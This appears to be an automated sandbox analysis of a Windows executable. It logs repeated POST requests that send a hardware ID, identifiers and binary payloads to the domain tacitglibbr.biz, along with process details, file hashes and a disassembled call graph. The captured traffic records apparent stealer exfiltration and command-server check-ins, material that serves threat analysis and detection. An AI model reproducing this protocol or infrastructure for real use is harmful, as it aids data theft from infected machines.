Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=elwcBqOEp%2B9mdzv1EImN3UFJwRiNCOhxLfqf3K7zibXMi5je2W0h%2FvdOENW%2FINncT2scRah3eFlV0660sj23hjdyjRiYpeNXiyBUnjYb16sEeU4gFj5gQiQQmLv%2ByPTSBR0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f35a224fa94c434-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1478&rtt_var=562&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=951&delivery_rate=1935056&cwnd=196&unsent_bytes=0&cid=6332c3b902aad9da&ts=1058&x=0"
                                                                                                                Data Ascii: 1j9aY68Oea9nfb4wf64MPRRCzgXikNjeofhWjk3gpmWErpUn/kY6PnFo/eRocYDy0QcK1jPaHI5mKFEOW+C2YUEumvNpkist4bi+N/6lBzfQBorU/ZMWGuA/147SM+FwF/5aYrANsarjPP4k9WBA9V9Mh8Fz2I3X4T5Xjk3gpmWErpUn/kY6Pun5PbduZlAwAMaaEybPDVrx7cdPnrQk9BJ7HrKwDbGq4zz+JPIiwrPVg84E/ZMWGuA/147XPjD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 104.21.50.16 | 443 | 7536 | C:\Users\user\Desktop\X2hna87N3Y.exe

Timestamp: 2024-12-17 08:44:51 UTC  Bytes transferred: 276  Direction: OUT  Data:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=47HA2BJC5LRQZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18138
Host: tacitglibbr.biz

Timestamp: 2024-12-17 08:44:51 UTC  Bytes transferred: 15331  Direction: OUT  Data (decoded from the captured hex dump, truncated as in the capture):
--47HA2BJC5LRQZ
Content-Disposition: form-data; name="hwid"

88FE57294B3FC45EE430B6CE554835A9
--47HA2BJC5LRQZ
Content-Disposition: form-data; name="pid"

2
--47HA2BJC5LRQZ
Content-Disposition: form-data; name="lid"

yau6Na--7911731954
--47HA2B

Timestamp: 2024-12-17 08:44:51 UTC  Bytes transferred: 2807  Direction: OUT  Data: non-printable binary payload (raw dump omitted)

Timestamp: 2024-12-17 08:44:52 UTC  Bytes transferred: 1043  Direction: IN  Data:
HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:44:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ffcsuhg6pulhs9epoelembfcn8; expires=Sat, 12-Apr-2025 02:31:30 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EGRl5vGyKO2c7k2VXJA1D7xEipbh%2B5y6G9fGMhs%2B2VDpkA3ne1VLJSm5ZqqR4KWDj%2BD1RfhHLCHFPt0MeruOEXiryHMYgs46lpE3fnMobYTvd%2F5a2%2BJTt2C8iTJA69Ea3BU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f35a23458b343ad-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1542&rtt_var=606&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2840&recv_bytes=19094&delivery_rate=1764350&cwnd=203&unsent_bytes=0&cid=b3f927090f563998&ts=1212&x=0"

Timestamp: 2024-12-17 08:44:52 UTC  Bytes transferred: 20  Direction: IN  Data (decoded from the captured hex dump): f\r\nok 8.46.123.189\r\n

Timestamp: 2024-12-17 08:44:52 UTC  Bytes transferred: 5  Direction: IN  Data (decoded from the captured hex dump): 0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 104.21.50.16 | 443 | 7536 | C:\Users\user\Desktop\X2hna87N3Y.exe

Timestamp: 2024-12-17 08:44:53 UTC  Bytes transferred: 276  Direction: OUT  Data:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=WKKY9HQD72NIN8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8765
Host: tacitglibbr.biz

Timestamp: 2024-12-17 08:44:53 UTC  Bytes transferred: 8765  Direction: OUT  Data (decoded from the captured hex dump, truncated as in the capture):
--WKKY9HQD72NIN8
Content-Disposition: form-data; name="hwid"

88FE57294B3FC45EE430B6CE554835A9
--WKKY9HQD72NIN8
Content-Disposition: form-data; name="pid"

2
--WKKY9HQD72NIN8
Content-Disposition: form-data; name="lid"

yau6Na--7911731954
--WKK

Timestamp: 2024-12-17 08:44:54 UTC  Bytes transferred: 1030  Direction: IN  Data:
HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:44:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=82457gi3ro7nrdi5r0r3v9gkv1; expires=Sat, 12-Apr-2025 02:31:33 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lNasL2CoP5ZE0c1j5l8JHrqioXQtFCxZm9NCg2Sny2BnLhEED2EhiSeydYuozeTWVgEZsrRTgxKl21OITQwNYAHRYiMyvd92WviXdwIaqhx0rHZT2VSL8MaTdOHHxQ1veGU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f35a2445a98439d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1599&rtt_var=601&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9699&delivery_rate=1817050&cwnd=201&unsent_bytes=0&cid=81d19a99e7c9b066&ts=768&x=0"

Timestamp: 2024-12-17 08:44:54 UTC  Bytes transferred: 20  Direction: IN  Data (decoded from the captured hex dump): f\r\nok 8.46.123.189\r\n

Timestamp: 2024-12-17 08:44:54 UTC  Bytes transferred: 5  Direction: IN  Data (decoded from the captured hex dump): 0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49734 | 104.21.50.16 | 443 | 7536 | C:\Users\user\Desktop\X2hna87N3Y.exe

Timestamp: 2024-12-17 08:44:55 UTC  Bytes transferred: 274  Direction: OUT  Data:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=7XS29QDJ54Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20400
Host: tacitglibbr.biz

Timestamp: 2024-12-17 08:44:55 UTC  Bytes transferred: 15331  Direction: OUT  Data (decoded from the captured hex dump, truncated as in the capture):
--7XS29QDJ54Q
Content-Disposition: form-data; name="hwid"

88FE57294B3FC45EE430B6CE554835A9
--7XS29QDJ54Q
Content-Disposition: form-data; name="pid"

3
--7XS29QDJ54Q
Content-Disposition: form-data; name="lid"

yau6Na--7911731954
--7XS29QDJ54Q

Timestamp: 2024-12-17 08:44:55 UTC  Bytes transferred: 5069  Direction: OUT  Data: binary payload, largely null bytes (raw dump omitted)

Timestamp: 2024-12-17 08:44:56 UTC  Bytes transferred: 1044  Direction: IN  Data:
HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:44:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=kpssdq99is7dtd1igbtimjlajp; expires=Sat, 12-Apr-2025 02:31:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T7zbwYZlyElU%2FrMtV8w6k%2BjlhlgtuvwsewVS4W8rxEs6wpM0uHFY19MxwOjtJn2S1aihyFPbWhd%2BkUSxxB7Mbz1xP0jbxHDZCkqnu%2Fryy%2FoD8s%2BLKBCERWeX0hYLkkhnQP4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f35a2523b5c32e8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1919&min_rtt=1897&rtt_var=727&sent=12&recv=27&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21354&delivery_rate=1539272&cwnd=246&unsent_bytes=0&cid=11f29f9463226a46&ts=894&x=0"

Timestamp: 2024-12-17 08:44:56 UTC  Bytes transferred: 20  Direction: IN  Data (decoded from the captured hex dump): f\r\nok 8.46.123.189\r\n

Timestamp: 2024-12-17 08:44:56 UTC  Bytes transferred: 5  Direction: IN  Data (decoded from the captured hex dump): 0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49735 | 104.21.50.16 | 443 | 7536 | C:\Users\user\Desktop\X2hna87N3Y.exe

Timestamp: 2024-12-17 08:44:58 UTC  Bytes transferred: 278  Direction: OUT  Data:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=6R60VIOJM9OLEPQJ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1266
Host: tacitglibbr.biz

Timestamp: 2024-12-17 08:44:58 UTC  Bytes transferred: 1266  Direction: OUT  Data (decoded from the captured hex dump, truncated as in the capture):
--6R60VIOJM9OLEPQJ
Content-Disposition: form-data; name="hwid"

88FE57294B3FC45EE430B6CE554835A9
--6R60VIOJM9OLEPQJ
Content-Disposition: form-data; name="pid"

1
--6R60VIOJM9OLEPQJ
Content-Disposition: form-data; name="lid"

yau6Na--7911731954

Timestamp: 2024-12-17 08:45:00 UTC  Bytes transferred: 1034  Direction: IN  Data:
HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:45:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1lfb38m265r5ec68597al2iirp; expires=Sat, 12-Apr-2025 02:31:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u5Ro2EANVXcEJCPq8Ri19Vq%2B0u5e6IH3MfyBbUdcp3PrrqsW0FT7F63h0YR%2BChT3ho196qg5POP2UZHLMn4fVsFa1pW9eejLNv1wHdCOKQmN4wL1tnB2FLqFVfcl4ATRRJc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f35a263ae5a8c5f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=2007&rtt_var=779&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2180&delivery_rate=1380614&cwnd=171&unsent_bytes=0&cid=31c544677e034314&ts=1976&x=0"

Timestamp: 2024-12-17 08:45:00 UTC  Bytes transferred: 20  Direction: IN  Data (decoded from the captured hex dump): f\r\nok 8.46.123.189\r\n

Timestamp: 2024-12-17 08:45:00 UTC  Bytes transferred: 5  Direction: IN  Data (decoded from the captured hex dump): 0\r\n\r\n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.449740104.21.50.1614437536C:\Users\user\Desktop\X2hna87N3Y.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 08:45:03 UTC | 279 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Z58EJ5HRPTGP3ZM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 551867
Host: tacitglibbr.biz
2024-12-17 08:45:03 UTC | 15331 bytes | OUT | Data Raw: 2d 2d 5a 35 38 45 4a 35 48 52 50 54 47 50 33 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 46 45 35 37 32 39 34 42 33 46 43 34 35 45 45 34 33 30 42 36 43 45 35 35 34 38 33 35 41 39 0d 0a 2d 2d 5a 35 38 45 4a 35 48 52 50 54 47 50 33 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 35 38 45 4a 35 48 52 50 54 47 50 33 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 0d 0a 2d 2d
Data Ascii: --Z58EJ5HRPTGP3ZMContent-Disposition: form-data; name="hwid"88FE57294B3FC45EE430B6CE554835A9--Z58EJ5HRPTGP3ZMContent-Disposition: form-data; name="pid"1--Z58EJ5HRPTGP3ZMContent-Disposition: form-data; name="lid"yau6Na--7911731954--
2024-12-17 08:45:05 UTC | 1050 bytes | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:45:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=fpc7ul0qav8jo330egj6fao2d3; expires=Sat, 12-Apr-2025 02:31:44 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7wJYzJnXzBcNi%2B%2FsS0vQHNWjNI2%2B%2BSvzgUWa%2BPEqjzBs7OmX32mXMKUow8PafjA0KhAY9EvJIHjxfCqrhPiQsNNatN9KJL6ZbN8fTMatxq%2B%2F6YaGEiP4vr0rHIlKBNibwY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f35a27f09184319-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1620&rtt_var=639&sent=316&recv=585&lost=0&retrans=0&sent_bytes=2840&recv_bytes=554344&delivery_rate=1802469&cwnd=233&unsent_bytes=0&cid=962f0636cd91003a&ts=2463&x=0"


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49743 | Destination IP: 104.21.50.16 | Destination Port: 443 | PID: 7536 | Process: C:\Users\user\Desktop\X2hna87N3Y.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 08:45:06 UTC | 263 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 87
Host: tacitglibbr.biz
2024-12-17 08:45:06 UTC | 87 bytes | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 26 6a 3d 26 68 77 69 64 3d 38 38 46 45 35 37 32 39 34 42 33 46 43 34 35 45 45 34 33 30 42 36 43 45 35 35 34 38 33 35 41 39
Data Ascii: act=get_message&ver=4.0&lid=yau6Na--7911731954&j=&hwid=88FE57294B3FC45EE430B6CE554835A9
2024-12-17 08:45:07 UTC | 1032 bytes | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:45:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=kuimc5j7ejo99qc21q9k1srtd7; expires=Sat, 12-Apr-2025 02:31:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mzcm0qllC2APo3mKC8CWNjcUW2uFuhEKK19YZZVpblZPsPT%2FtBE18%2Bc4k2qPuRyQkhhwF5egPxJ0mIMgEoo6x2jQGTzxtdGRFFvxl7YEEOC2IORfkeevmDHjlf8hEKxmAP0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f35a296bfa17287-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1858&min_rtt=1841&rtt_var=724&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1476985&cwnd=191&unsent_bytes=0&cid=6894e557e5ef6776&ts=751&x=0"
2024-12-17 08:45:07 UTC | 54 bytes | IN | Data Raw: 33 30 0d 0a 72 6c 78 35 77 72 32 62 6f 62 61 4f 78 45 6e 33 4b 63 51 4a 69 64 69 4f 41 6f 66 30 65 6d 58 57 75 52 35 42 61 6c 57 4a 53 72 44 31 41 51 3d 3d 0d 0a
Data Ascii: 30rlx5wr2bobaOxEn3KcQJidiOAof0emXWuR5BalWJSrD1AQ==
2024-12-17 08:45:07 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 03:44:39
Start date: 17/12/2024
Path: C:\Users\user\Desktop\X2hna87N3Y.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\X2hna87N3Y.exe"
Imagebase: 0xd80000
File size: 800'256 bytes
MD5 hash: 443F4CF9F362A96BBD0845BA6D2859F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 03:44:40
Start date: 17/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 03:44:43
Start date: 17/12/2024
Path: C:\Users\user\Desktop\X2hna87N3Y.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\X2hna87N3Y.exe"
Imagebase: 0xd80000
File size: 800'256 bytes
MD5 hash: 443F4CF9F362A96BBD0845BA6D2859F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Execution Graph

Execution Coverage: 6%
Dynamic/Decrypted Code Coverage: 0.5%
Signature Coverage: 2.5%
Total number of Nodes: 2000
Total number of Limit Nodes: 26
20303->20304 20307 d95d08 20304->20307 20305 da1a1f __fread_nolock 14 API calls 20309 d95cb7 20305->20309 20306 d95d5a 20308 d934c5 __dosmaperr 14 API calls 20306->20308 20307->20306 20307->20310 20311 d95d5f 20308->20311 20313 d95ce2 20309->20313 20310->20305 20310->20309 20312 d93bb0 __strnicoll 29 API calls 20311->20312 20312->20309 20316 d8f158 LeaveCriticalSection 20313->20316 20315 d95ce8 20315->20067 20316->20315 22535 d88deb 22540 d89bea 22535->22540 22537 d88dfe 22538 d88f6d std::ios_base::_Init 32 API calls 22537->22538 22539 d88e08 22538->22539 22541 d89bf6 __EH_prolog3 22540->22541 22544 d89b1f 22541->22544 22543 d89c48 codecvt 22543->22537 22553 d899d8 22544->22553 22546 d89b2a 22561 d83e50 22546->22561 22549 d89b56 22551 d89b62 22549->22551 22579 d8b99d 22549->22579 22551->22543 22554 d899e4 __EH_prolog3 22553->22554 22555 d82ae0 std::ios_base::_Init 39 API calls 22554->22555 22556 d89a15 22555->22556 22557 d88e36 codecvt 3 API calls 22556->22557 22558 d89a1c 22557->22558 22559 d89a2d codecvt 22558->22559 22584 d894bf 22558->22584 22559->22546 22562 d83e74 22561->22562 22563 d83ec0 49 API calls 22562->22563 22564 d83e82 std::ios_base::_Ios_base_dtor 22563->22564 22565 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22564->22565 22566 d83eb1 22565->22566 22566->22549 22567 d82ae0 22566->22567 22568 d82bcc 22567->22568 22569 d82b24 22567->22569 22570 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22568->22570 22572 d8c47a CallUnexpected RaiseException 22569->22572 22573 d82b44 22569->22573 22571 d82bd6 22570->22571 22571->22549 22572->22573 22622 d82be0 22573->22622 22575 d82b9f 22625 d82c20 22575->22625 22578 d8c47a CallUnexpected RaiseException 22578->22568 22580 d891bd std::_Lockit::_Lockit 7 API calls 22579->22580 22581 d8b9ab 22580->22581 22582 d891ee std::_Lockit::~_Lockit 
2 API calls 22581->22582 22583 d8b9e6 22582->22583 22583->22551 22585 d894cb __EH_prolog3 22584->22585 22586 d891bd std::_Lockit::_Lockit 7 API calls 22585->22586 22587 d894d6 22586->22587 22595 d89507 22587->22595 22596 d893c8 22587->22596 22589 d891ee std::_Lockit::~_Lockit 2 API calls 22591 d89544 codecvt 22589->22591 22590 d894e9 22602 d89552 22590->22602 22591->22559 22594 d89349 _Yarn 14 API calls 22594->22595 22595->22589 22597 d88e36 codecvt 3 API calls 22596->22597 22598 d893d3 22597->22598 22599 d893e7 22598->22599 22606 d8945c 22598->22606 22599->22590 22603 d8955e 22602->22603 22604 d894f1 22602->22604 22609 d8b844 22603->22609 22604->22594 22607 d89349 _Yarn 14 API calls 22606->22607 22608 d893e5 22607->22608 22608->22590 22610 d9411a 22609->22610 22611 d8b854 EncodePointer 22609->22611 22612 d997c5 std::locale::_Setgloballocale 2 API calls 22610->22612 22611->22604 22613 d9411f 22612->22613 22614 d997ec std::locale::_Setgloballocale 39 API calls 22613->22614 22617 d9412a 22613->22617 22614->22617 22615 d94134 IsProcessorFeaturePresent 22618 d94140 22615->22618 22616 d94153 22619 d91334 std::locale::_Setgloballocale 21 API calls 22616->22619 22617->22615 22617->22616 22620 d93c11 std::locale::_Setgloballocale 8 API calls 22618->22620 22621 d9415d 22619->22621 22620->22616 22630 d82dc0 22622->22630 22624 d82bf7 std::ios_base::_Init 22624->22575 22648 d831e0 22625->22648 22628 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22629 d82bb4 22628->22629 22629->22578 22633 d82e00 22630->22633 22634 d82dc8 22633->22634 22635 d82e27 22633->22635 22634->22624 22641 d88eb8 AcquireSRWLockExclusive 22635->22641 22637 d82e35 22637->22634 22638 d88f6d std::ios_base::_Init 32 API calls 22637->22638 22639 d82e50 22638->22639 22646 d88f07 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 22639->22646 22645 d88ecc 22641->22645 22642 d88ed1 
ReleaseSRWLockExclusive 22642->22637 22645->22642 22647 d88f58 SleepConditionVariableSRW 22645->22647 22646->22634 22647->22645 22649 d81040 std::_Throw_Cpp_error 30 API calls 22648->22649 22650 d83218 22649->22650 22651 d832c0 std::_Throw_Cpp_error 30 API calls 22650->22651 22652 d83243 22651->22652 22653 d810b0 std::_Throw_Cpp_error 29 API calls 22652->22653 22654 d8324e 22653->22654 22655 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22654->22655 22656 d82c67 22655->22656 22656->22628 20398 d8949d 20401 d8939d 20398->20401 20400 d894a8 error_info_injector 20406 d893eb 20401->20406 20404 d893bb 20404->20400 20405 d94c7a ___vcrt_freefls@4 14 API calls 20405->20404 20413 d891bd 20406->20413 20409 d94c7a ___vcrt_freefls@4 14 API calls 20410 d8944f 20409->20410 20419 d891ee 20410->20419 20412 d893ac 20412->20404 20412->20405 20414 d891cc 20413->20414 20415 d891d3 20413->20415 20426 d93ed6 20414->20426 20417 d891d1 20415->20417 20431 d8b828 EnterCriticalSection 20415->20431 20417->20409 20420 d891f8 20419->20420 20421 d93ee4 20419->20421 20422 d8920b 20420->20422 20474 d8b836 LeaveCriticalSection 20420->20474 20475 d93ebf LeaveCriticalSection 20421->20475 20422->20412 20425 d93eeb 20425->20412 20432 d9832b 20426->20432 20431->20417 20433 d984b2 std::_Locinfo::_Locinfo_dtor 5 API calls 20432->20433 20434 d98330 20433->20434 20453 d984cc 20434->20453 20437 d984e6 std::_Locinfo::_Locinfo_dtor 5 API calls 20438 d9833a 20437->20438 20456 d98500 20438->20456 20441 d9851a std::_Locinfo::_Locinfo_dtor 5 API calls 20442 d98344 20441->20442 20459 d98534 20442->20459 20452 d9835d 20452->20452 20454 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20453->20454 20455 d98335 20454->20455 20455->20437 20457 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20456->20457 20458 d9833f 20457->20458 20458->20441 20460 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20459->20460 20461 d98349 
20460->20461 20462 d9854e 20461->20462 20463 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20462->20463 20464 d9834e 20463->20464 20465 d98568 20464->20465 20466 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20465->20466 20467 d98353 20466->20467 20468 d98582 20467->20468 20469 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20468->20469 20470 d98358 20469->20470 20471 d9859c 20470->20471 20472 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20471->20472 20473 d985b2 20472->20473 20473->20452 20474->20422 20475->20425 17595 d8c190 17596 d8c19c ___scrt_is_nonwritable_in_current_image 17595->17596 17621 d89093 17596->17621 17598 d8c1a3 17599 d8c2fc 17598->17599 17607 d8c1cd ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 17598->17607 17669 d8b64c IsProcessorFeaturePresent 17599->17669 17601 d8c303 17673 d9131e 17601->17673 17606 d8c1ec 17607->17606 17611 d8c26d 17607->17611 17651 d91368 17607->17651 17610 d8c273 17636 db5bf0 17610->17636 17632 d9389d 17611->17632 17622 d8909c 17621->17622 17679 d8b2b8 IsProcessorFeaturePresent 17622->17679 17626 d890ad 17627 d890b1 17626->17627 17689 d8f05f 17626->17689 17627->17598 17630 d890c8 17630->17598 17633 d938ab 17632->17633 17634 d938a6 17632->17634 17633->17610 17761 d939c6 17634->17761 18603 d81790 17636->18603 17639 d81790 123 API calls 17640 db5c32 17639->17640 18606 d81690 17640->18606 17652 d95c3b ___scrt_is_nonwritable_in_current_image 17651->17652 17653 d9137e std::_Locinfo::_Locinfo_dtor 17651->17653 17654 d975d3 __Getctype 39 API calls 17652->17654 17653->17611 17655 d95c4c 17654->17655 17656 d9411a CallUnexpected 39 API calls 17655->17656 17657 d95c76 17656->17657 17670 d8b662 __fread_nolock std::locale::_Setgloballocale 17669->17670 17671 d8b70d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17670->17671 17672 d8b751 std::locale::_Setgloballocale 17671->17672 17672->17601 17674 d91469 std::locale::_Setgloballocale 21 API calls 
